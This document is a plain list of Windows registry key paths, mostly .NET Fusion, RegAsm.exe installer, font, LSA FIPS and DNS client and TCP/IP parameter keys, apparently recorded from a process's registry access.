HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgJITDebugLaunchSetting
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DbgManagedDebugger
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\432ba598\f6e8397\6f\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\InstallationType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\159a66b8\424bd4d8\87\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Library
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\IsMultiInstance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\First Counter
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\CategoryOptions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\FileMappingSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\.NET CLR Networking\Performance\Counter Names
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f20adc4\4c6feaec
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Windows|Microsoft.NET|Framework|v2.0.50727|RegAsm.exe.Config
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Windows|Microsoft.NET|Framework|v2.0.50727|RegAsm.exe.Config
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Windows|Microsoft.NET|Framework|v2.0.50727|RegAsm.exe.Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f20adc4\4a2492cd
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus\FontCachePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink\SystemLink
HKEY_CURRENT_USER\EUDC\1252
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DnsCache\Parameters
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\DnsClient
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DNS
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UseDomainNameDevolution
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DomainNameDevolutionLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\PrioritizeRecordData
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\AllowUnqualifiedQuery
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AppendToMultiLabelName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenBadTlds
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenBadTlds
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenUnreachableServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ScreenDefaultServers
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DynamicServerQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\FilterClusterIp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\FilterClusterIp
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\WaitForNameErrorOnAll
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseEdns
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseEdns
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsSecureNameQueryFallback
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\EnableDAForAllNetworks
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DirectAccessQueryOrder
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\QueryIpMatching
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\QueryIpMatching
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UseHostsFile
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseHostsFile
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AddrConfigControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AddrConfigControl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterPrimaryName
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterReverseLookup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableReverseAddressRegistrations
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegisterWanAdapters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DisableWanDynamicUpdate
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationTTL
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DefaultRegistrationRefreshInterval
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\UpdateSecurityLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UpdateTopLevelDomainZones
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DowncaseSpnCauseApiOwnerIsTooLazy
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\RegistrationOverwrite
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheSize
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheSize
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxNegativeCacheTtl
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\AdapterTimeoutLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ServerPriorityTimeLimit
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MaxCachedSockets
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MaxCachedSockets
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableMulticast
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastResponderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderFlags
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\MulticastSenderMaxTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsTest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\CacheAllCompartments
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\UseNewRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\ResolverRegistrationOnly
HKEY_LOCAL_MACHINE\System\Setup
HKEY_LOCAL_MACHINE\SYSTEM\Setup\SystemSetupInProgress
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Dnscache\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\DnsQuickQueryTimeouts
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\PrimaryDomainName
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\System\DNSClient
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Hostname
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\AdapterDomainName
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{C2D43895-0262-4873-A789-C2F96D24B693}\DhcpDomain
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{846EE342-7039-11DE-9D20-806E6F6E6963}
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\QueryAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableAdapterDomainName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationEnabled
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DisableDynamicUpdate
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegisterAdapterName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\EnableAdapterDomainNameRegistration
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\RegistrationMaxAddressCount
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\MaxNumberOfAddressesToRegister
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\Domain
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{846ee342-7039-11de-9d20-806e6f6e6963}\DhcpDomain
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient\SearchList
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\Tcpip\Parameters\SearchList
